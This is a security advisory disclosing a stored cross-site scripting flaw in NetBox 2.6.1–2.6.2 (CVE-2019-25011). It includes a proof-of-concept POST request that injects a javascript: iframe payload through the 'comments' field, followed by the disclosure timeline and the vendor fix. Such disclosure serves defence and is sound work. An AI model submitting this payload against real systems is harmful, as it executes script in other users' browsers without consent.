NetBox version: 2.6.1 -2.6.2 Cross-Site Scripting vulnerability

31-08-2019

Affected Product: NetBox version: 2.6.1 -2.6.2
Credits: Vulnerability discovered by Claudio Cinquino

CVE:  CVE-2019-25011

Executive Summary

Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]

Parameter:
name="comments" [ works on all pages where the parameter is present ]

PoC

POST /dcim/sites/add/ HTTP/1.1

Host: xxx

User-Agent: xxx

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: xxx

Content-Type: multipart/form-data; boundary=---------------------------57052814523281

Content-Length: 2158

Connection: close

Cookie: csrftoken=xxx; sessionid=xxx

Upgrade-Insecure-Requests: 1

 

-----------------------------57052814523281

Content-Disposition: form-data; name="csrfmiddlewaretoken"

 

xxxx

 

<snipped>

 

-----------------------------57052814523281

Content-Disposition: form-data; name="comments"

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

 

-----------------------------57052814523281

Content-Disposition: form-data; name="_create"

 

-----------------------------57052814523281--

 

 

 

 

 

 

 

 

 


 

Disclosure Timeline

31/08/2019 Vulnerability Discovered
03/09/2019 Initial vendor notification
09/10/2019 The vendor fixed the vulnerability

 

References

[1] https://github.com/netbox-community/netbox/issues/3471